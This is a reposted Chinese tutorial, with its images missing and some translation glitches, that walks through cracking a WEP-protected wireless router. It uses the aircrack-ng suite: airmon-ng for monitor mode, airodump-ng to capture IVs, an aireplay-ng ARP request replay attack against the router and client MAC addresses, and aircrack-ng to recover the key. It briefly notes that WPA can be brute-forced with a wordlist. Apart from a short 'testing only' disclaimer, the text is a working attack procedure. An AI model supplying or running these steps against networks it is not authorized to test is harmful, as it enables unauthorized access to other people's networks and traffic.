[转](组图)">
[Transfer]'TITLE ='Soho型路由器wep加密破解[Transfer]'/>
继续监视网卡。在这里,使用airmon-ng工具并输入airmon-ng start wlan0。成功后,如下:
[转]'/>
带下划线的部分是网卡的芯片类型,红色圆圈是网卡设置为监视状态后的虚拟网卡。
以下是检测无线网络并抓取无线数据包的方法:如图所示,命令airodump-ng mon0:
[转]'/>
我们可以看到无线路由器的mac地址,无线网络(tp-link——shark)所在的通道(ch = 6),连接到网络的客户端的mac地址等)。 )。
我们复制路由mac(以54开头的那台)和客户端mac(00:1F:3c ......)进行备份
以下命令:airodump-ng --ivs -w shark -c 6 mon0
-ivs可以过滤掉ivs文件;
-w后跟要保存的文件名,此处为shark,如果是第一次破解,则生成的文件名应为shark-0 1. ivs
-c后跟频道,这是第六个频道;
mon0是监视网卡
成功后如下图所示:
[转]'/>
红色圆圈部分是我们捕获的无线数据包的数量。由于客户端与路由器之间的流量交互很小,因此数据增长非常缓慢,并且破解Web密码通常需要捕获至少1w的数据,因此为了强制进行较大的流量交互,我们需要执行以下操作: arp攻击,使用攻击主机(您的笔记本电脑)向受攻击者(客户端和无线路由器)发送大量arprequest数据包,以强制其生成大量ARP应答数据包,从而快速提高数据包捕获的速度!
命令:aireplay-ng -3 -b路由了mac -h客户端的mac mon0(建议在此处打开另一个命令窗口)
-3表示使用arprequest攻击
-b,然后是路线的mac
-h后跟客户端的mac
成功后如图所示:
[转]'/>
这时,如果观察数据,您会发现它的数量正在迅速增加。
然后分析生成的ivs文件并计算密码:
命令:aircrack-ng shark-0 1. ivs
成功后如图所示:
[转]'/>
看到“找到钥匙!”?请注意,红色圆圈是破解的密码! ! 。 。 。
说明:
此方法仅适用于通过wep加密的无线网络。对于通过wap加密的无限网络,破解过程相似,但是您必须创建自己的密码字典以进行暴力破解。暂时未在此介绍此方法;
仅建议将这种方法用于测试!如果您使用此工具执行非法操作,则后果自负! ! ;
以上内容并非完全原创。为了尊重bt5的技术和开发人员,我特此说明!
本文来自本站,转载请注明本文网址:
http://www.pc-fly.com/a/tongxingongju/article-373816-1.html
……